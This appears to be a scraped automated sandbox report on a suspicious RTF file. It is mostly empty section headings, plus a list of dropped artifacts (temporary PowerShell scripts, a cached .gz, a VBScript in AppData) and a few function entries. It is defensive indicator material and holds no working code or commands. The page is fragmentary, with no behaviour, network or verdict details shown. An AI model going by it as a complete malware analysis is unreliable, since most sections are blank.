Windows Analysis Report 4YlwTsmpuZ.rtf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Exploits

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatideaforfollowers[1].gz

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{89CD6143-AF39-4DB2-BD0A-77C70AFAF6C5}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6541E432-FCF8-462E-B89E-94C2D4EFD985}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F0D9C1B9-F0D5-4902-9161-FED34811C4AD}.tmp

C:\Users\user\AppData\Local\Temp\iznehrzd.ier.psm1

C:\Users\user\AppData\Local\Temp\vjz3rtmh.qm2.ps1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\4YlwTsmpuZ.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS

C:\Users\user\Desktop\~$lwTsmpuZ.rtf

Static File Info

General

File Icon

Static RTF Info

Objects

Windows Analysis Report
4YlwTsmpuZ.rtf

Function 03510668 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Function 03510696 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Function 03510681 Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Function 035105D5 Relevance: 1.6, APIs: 1, Instructions: 57
libraryCOMMON

Function 035106BB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 035106C2 Relevance: .0, Instructions: 14
COMMON

Function 0351050A Relevance: 1.6, APIs: 1, Instructions: 67
COMMON